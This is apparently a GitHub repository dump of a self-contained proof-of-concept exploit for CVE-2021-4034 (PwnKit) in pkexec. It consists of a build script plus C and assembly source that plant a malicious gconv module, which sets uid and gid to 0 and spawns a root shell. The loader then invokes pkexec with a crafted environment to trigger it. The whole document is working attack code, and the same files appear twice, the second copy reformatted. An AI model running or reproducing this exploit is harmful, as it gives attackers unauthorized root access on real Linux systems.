smx-smx/!pwnkit

## !pwnkit
CVE-2021-4034 (pkexec) self contained exploit PoC

## make.sh
#!/bin/bash
gcc pwnkit.c -shared -o pwnkit.so
strip -s pwnkit.so
gcc -DLOADER pwnkit.c pwnkit.S -o pwnkit
strip -s pwnkit
rm pwnkit.so

## pwnkit.c
/**
 * @file pwnkit.c
 * @author Smx (smxdev4@gmail.com)
 * @brief
 *  CVE-2021-4034 (pkexec) self contained exploit PoC
 *  Implementation of the Qualys paper
 * @version 0.1
 * @date 2022-01-26
 * @copyright Copyright (c) 2022
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <libgen.h>
#include <linux/limits.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <spawn.h>

int gconv (void *step,
       void *data,
       const unsigned char **inptrp,
       const unsigned char *inend,
       unsigned char **outbufstart, size_t *irreversible,
       int do_flush, int consume_incomplete)
{
	return 4;
}

int gconv_init (void *ignored){	return 0; }
int gconv_end (void *ignored){ return 0; }

#define TARGET_VAR "GCONV_PATH"
#define TARGET_PREFIX "gconv"
#define TARGET_MODULE "pwnkit"
#define TARGET_CHARSET "PWNKIT"

#ifndef LOADER
__attribute__((constructor))
void ctor(){
	puts("-----------------");
	puts("-- Smx says hi --");
	puts("-----------------");

	setresuid(0, 0, 0);
	setresgid(0, 0, 0);

	char *argv[] = {"/bin/sh", NULL};
	char *envp[] = {"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL};

	pid_t pid = 0;
	posix_spawn(&pid, "/bin/sh",
		NULL, NULL,
		argv, envp
	);
	int status = 0;
	waitpid(pid, &status, 0);

	unlink(TARGET_PREFIX"/"TARGET_MODULE".so");
	unlink(TARGET_VAR"=./"TARGET_PREFIX);
	unlink(TARGET_PREFIX"/gconv-modules");

	rmdir(TARGET_VAR"=.");
	rmdir(TARGET_PREFIX);
}
#endif

#ifdef LOADER
extern void *blob_start;
extern void *blob_end;

int main(int argc, char *argv[]){
	char buf[PATH_MAX];
	readlink("/proc/self/exe", buf, sizeof(buf));
	char *dir = dirname(buf);
	chdir(dir);

	int fd;

	// write env trigger
	mkdir(TARGET_VAR"=.", 0755);

	// write prefix
	mkdir(TARGET_PREFIX, 0755);

	fd = open(TARGET_PREFIX"/"TARGET_MODULE".so", O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777);
	write(fd, &blob_start, (uintptr_t)&blob_end - (uintptr_t)&blob_start);

	fd = open(TARGET_VAR"=./"TARGET_PREFIX, O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777);
	close(fd);

	// write module config
	char conf[] =
		"module  "TARGET_CHARSET"//               INTERNAL            "TARGET_MODULE"          1\n"
		"module  INTERNAL               "TARGET_CHARSET"//            "TARGET_MODULE"          1\n"
		;

	fd = open(TARGET_PREFIX"/gconv-modules", O_CREAT | O_WRONLY | O_TRUNC, (mode_t)0777);
	write(fd, conf, sizeof(conf) -1 );
	close(fd);

	char *args[] = {NULL};
	char *env[] = {
		TARGET_PREFIX,
		"PATH="TARGET_VAR"=.",
		"CHARSET="TARGET_CHARSET,
		"XAUTHORITY=../",
		NULL
	};
	execve("/usr/bin/pkexec", args, env);
	return 0;
}
#endif

## pwnkit.S
.section .data
.globl blob_start
.globl blob_end

blob_start:
.incbin "pwnkit.so"
blob_end:
	#!/bin/bash
	gcc pwnkit.c -shared -o pwnkit.so
	strip -s pwnkit.so
	gcc -DLOADER pwnkit.c pwnkit.S -o pwnkit
	strip -s pwnkit
	rm pwnkit.so
	/**
	* @file pwnkit.c
	* @author Smx (smxdev4@gmail.com)
	* @brief
	* CVE-2021-4034 (pkexec) self contained exploit PoC
	* Implementation of the Qualys paper
	* @version 0.1
	* @date 2022-01-26
	* @copyright Copyright (c) 2022
	*/
	#define _GNU_SOURCE
	#include <stdio.h>
	#include <stdint.h>
	#include <unistd.h>
	#include <libgen.h>
	#include <linux/limits.h>
	#include <fcntl.h>
	#include <sys/stat.h>
	#include <sys/wait.h>
	#include <spawn.h>

	int gconv (void *step,
	void *data,
	const unsigned char **inptrp,
	const unsigned char *inend,
	unsigned char *outbufstart, size_t irreversible,
	int do_flush, int consume_incomplete)
	{
	return 4;
	}

	int gconv_init (void *ignored){ return 0; }
	int gconv_end (void *ignored){ return 0; }

	#define TARGET_VAR "GCONV_PATH"
	#define TARGET_PREFIX "gconv"
	#define TARGET_MODULE "pwnkit"
	#define TARGET_CHARSET "PWNKIT"

	#ifndef LOADER
	__attribute__((constructor))
	void ctor(){
	puts("-----------------");
	puts("-- Smx says hi --");
	puts("-----------------");

	setresuid(0, 0, 0);
	setresgid(0, 0, 0);

	char *argv[] = {"/bin/sh", NULL};
	char *envp[] = {"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL};

	pid_t pid = 0;
	posix_spawn(&pid, "/bin/sh",
	NULL, NULL,
	argv, envp
	);
	int status = 0;
	waitpid(pid, &status, 0);

	unlink(TARGET_PREFIX"/"TARGET_MODULE".so");
	unlink(TARGET_VAR"=./"TARGET_PREFIX);
	unlink(TARGET_PREFIX"/gconv-modules");

	rmdir(TARGET_VAR"=.");
	rmdir(TARGET_PREFIX);
	}
	#endif

	#ifdef LOADER
	extern void *blob_start;
	extern void *blob_end;

	int main(int argc, char *argv[]){
	char buf[PATH_MAX];
	readlink("/proc/self/exe", buf, sizeof(buf));
	char *dir = dirname(buf);
	chdir(dir);

	int fd;

	// write env trigger
	mkdir(TARGET_VAR"=.", 0755);

	// write prefix
	mkdir(TARGET_PREFIX, 0755);

	fd = open(TARGET_PREFIX"/"TARGET_MODULE".so", O_CREAT \| O_WRONLY \| O_TRUNC, (mode_t)0777);
	write(fd, &blob_start, (uintptr_t)&blob_end - (uintptr_t)&blob_start);

	fd = open(TARGET_VAR"=./"TARGET_PREFIX, O_CREAT \| O_WRONLY \| O_TRUNC, (mode_t)0777);
	close(fd);

	// write module config
	char conf[] =
	"module "TARGET_CHARSET"// INTERNAL "TARGET_MODULE" 1\n"
	"module INTERNAL "TARGET_CHARSET"// "TARGET_MODULE" 1\n"
	;

	fd = open(TARGET_PREFIX"/gconv-modules", O_CREAT \| O_WRONLY \| O_TRUNC, (mode_t)0777);
	write(fd, conf, sizeof(conf) -1 );
	close(fd);

	char *args[] = {NULL};
	char *env[] = {
	TARGET_PREFIX,
	"PATH="TARGET_VAR"=.",
	"CHARSET="TARGET_CHARSET,
	"XAUTHORITY=../",
	NULL
	};
	execve("/usr/bin/pkexec", args, env);
	return 0;
	}
	#endif
	.section .data
	.globl blob_start
	.globl blob_end

	blob_start:
	.incbin "pwnkit.so"
	blob_end: